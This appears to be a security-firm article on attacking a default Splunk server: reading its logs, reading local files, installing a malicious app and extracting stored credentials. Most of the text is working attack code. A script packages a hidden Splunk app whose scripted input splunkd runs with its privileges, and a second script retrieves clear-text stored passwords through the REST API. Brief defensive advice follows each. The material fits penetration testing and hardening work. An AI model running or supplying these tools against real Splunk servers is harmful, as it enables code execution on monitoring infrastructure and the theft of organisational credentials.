Weaponizing Splunk: Attacking The Server

Attacking a default Splunk installation allows an attacker to gather intelligence about the Splunk server itself as well as the victim environment it monitors. The attacker’s aim is to gain a foothold without setting off any alarms.

“Through this Weaponizing Splunk investigation, I’ll show how a poorly defended Splunk system can allow attackers to do some serious damage to your network and organization.”
-Ryan, TBG Security's Director of Security Engineering


Attack Demonstration Lab Setup

Victim Server Configuration
Ubuntu 16.04
Splunk Server 6.5.3

Penetration Testing System Configuration
Kali Linux Rolling


Attack Missions on Splunk Server (Videos)

Cyberattack Video: Reviewing The Logs
Accessing the logs can provide an attacker with valuable intelligence about the victim environment: hostnames, internal IP addresses, user names, running services, and which security tooling is (or is not) reporting in. This information could allow an unauthorized person to build a very detailed attack profile before touching any other host.

Cyberattack Video: Get Local File Access
Accessing the operating system’s files through Splunk can provide an attacker with credentials, password hashes, configuration files, and other confidential data held on the server, readable with whatever privileges the splunkd process runs under. This information could allow an unauthorized person to gain privileged access into the victim environment.

Weaponizing Splunk Malicious Apps

Cyberattack Video: Malicious Applications
Running malicious or unauthorized Splunk “add-ons” (apps) allows an attacker to execute code on a Splunk server, because an app can ship scripts that splunkd runs on a schedule with its own privileges. This can allow them to fully compromise the server and gain that initial foothold into the victim environment.
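The mechanism behind the malicious-app video is a scripted input: any app whose default/inputs.conf carries a [script://] stanza gets its script executed by splunkd on the configured interval, as the account splunkd runs under. The following is an added example, not code from the page or from TBG Security, that packages such an app the way Splunk’s “Install app from file” expects it (one top-level directory named after the app). The app name and the payload are assumptions made for the demo; the payload only records the identity it ran as.

```python
import io
import tarfile

# Hypothetical app name used throughout this example (assumption, not from the page).
APP_NAME = "tbg_demo_app"

# Constructed payload. Splunk executes scripted inputs with splunkd's own
# privileges (root if Splunk was started as root), so whatever this script
# does happens as the Splunk service account. The demo just records who that is.
PAYLOAD_SH = """#!/bin/sh
id > /tmp/splunk_scripted_input_ran_as.txt
"""

# inputs.conf: a [script://] stanza is Splunk's documented way of having splunkd
# run a program on a schedule; 'interval' is in seconds.
INPUTS_CONF = f"""[script://./bin/payload.sh]
disabled = 0
interval = 60
sourcetype = {APP_NAME}:payload
"""

# app.conf: marks the app installed and enabled. is_visible = 0 keeps it out of
# the app menu, so a casual look at the web UI does not reveal it.
APP_CONF = f"""[install]
state = enabled

[ui]
is_visible = 0
label = {APP_NAME}
"""


def build_app(app_name=APP_NAME):
    """Return the bytes of a .tgz laid out as a Splunk app package."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add(relpath, text, mode=0o644):
            data = text.encode()
            info = tarfile.TarInfo(name=f"{app_name}/{relpath}")
            info.size = len(data)
            info.mode = mode
            tar.addfile(info, io.BytesIO(data))

        add("bin/payload.sh", PAYLOAD_SH, mode=0o755)  # must be executable or splunkd will not run it
        add("default/inputs.conf", INPUTS_CONF)
        add("default/app.conf", APP_CONF)
    return buf.getvalue()


def list_members(tgz_bytes):
    """Sorted member names of a package, for inspection."""
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        return sorted(m.name for m in tar.getmembers())


def member_mode(tgz_bytes, name):
    """Unix mode bits recorded for one member (the script must be 0755)."""
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        return tar.getmember(name).mode


if __name__ == "__main__":
    package = build_app()
    with open(f"{APP_NAME}.tgz", "wb") as f:
        f.write(package)
    print(list_members(package))
```

Upload the resulting .tgz through Apps > Manage Apps > Install app from file with any admin account (the same step can be scripted against the splunkd REST API), and after the app is enabled splunkd runs bin/payload.sh every 60 seconds. The defensive corollary is the one the video makes: app installation is code execution, so restrict who holds the admin role and alert on new entries under $SPLUNK_HOME/etc/apps.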

Weaponizing Splunk Extract Data

Cyberattack Video: Extract Data
Splunk stores credentials and other vital confidential information within its configuration files. This information is stored in an encrypted format, but the key (splunk.secret) lives on the same server, and Splunk’s own REST API will hand the values back in plain text to any account holding the right capability, so an attacker with admin-level access can extract them without breaking any cryptography.
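The API route the video relies on is the storage/passwords endpoint: it lists every credential an app has stashed in passwords.conf, and for callers holding the list_storage_passwords capability (the admin role by default) the response includes a clear_password field alongside the encrypted one. The block below is an added example, not code from the page or from TBG Security; it parses a constructed response in that shape and also carries a live variant for use against a lab server. The host name, the realms and the credential values are constructed sample data.

```python
import base64
import json
import ssl
import urllib.request

# Constructed sample of what storage/passwords returns with output_mode=json.
# Entry names follow Splunk's "<realm>:<username>:" convention; 'password' is
# always masked, 'encr_password' is the on-disk form, and 'clear_password' is
# only present when the caller may list stored passwords.
SAMPLE_RESPONSE = json.dumps({
    "entry": [
        {
            "name": "ldap_bind:svc_splunk:",
            "acl": {"app": "search", "owner": "nobody"},
            "content": {
                "realm": "ldap_bind",
                "username": "svc_splunk",
                "password": "********",
                "encr_password": "$1$gmk9kVZ1QZ0=",
                "clear_password": "Winter2017!",
            },
        },
        {
            "name": ":aws_access:",
            "acl": {"app": "aws_addon", "owner": "nobody"},
            "content": {
                "realm": "",
                "username": "aws_access",
                "password": "********",
                "encr_password": "$1$0qLtn1dF5A==",
                "clear_password": "s3cr3t-access-key",
            },
        },
    ]
})


def passwords_url(host, port=8089, owner="nobody", app="-"):
    """REST URL listing stored credentials across all apps (app='-')."""
    return (f"https://{host}:{port}/servicesNS/{owner}/{app}/storage/passwords"
            f"?output_mode=json&count=0")


def extract_clear_passwords(response_body):
    """One dict per stored credential; clear_password is None when the server
    withheld it (caller lacked the capability)."""
    doc = json.loads(response_body)
    creds = []
    for entry in doc.get("entry", []):
        content = entry.get("content", {})
        creds.append({
            "app": entry.get("acl", {}).get("app"),
            "realm": content.get("realm", ""),
            "username": content.get("username"),
            "clear_password": content.get("clear_password"),
        })
    return creds


def fetch_clear_passwords(host, user, password, port=8089):
    """Live variant: query splunkd with HTTP basic auth. splunkd ships with a
    self-signed certificate, so verification is disabled for the lab."""
    req = urllib.request.Request(passwords_url(host, port))
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx) as resp:
        return extract_clear_passwords(resp.read().decode())


if __name__ == "__main__":
    for cred in extract_clear_passwords(SAMPLE_RESPONSE):
        print(f"{cred['app']:>10}  {cred['realm'] or '-':>10}  "
              f"{cred['username']}  {cred['clear_password']}")
```

Two caveats a practitioner will want. First, the same values are recoverable offline: $SPLUNK_HOME/etc/auth/splunk.secret is the key for every encr_password on that instance, so the local file read shown in the earlier video yields the same credentials without touching the API. Second, the defensive lever is the capability, not the encryption: remove list_storage_passwords from roles that do not need it and audit who holds admin.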

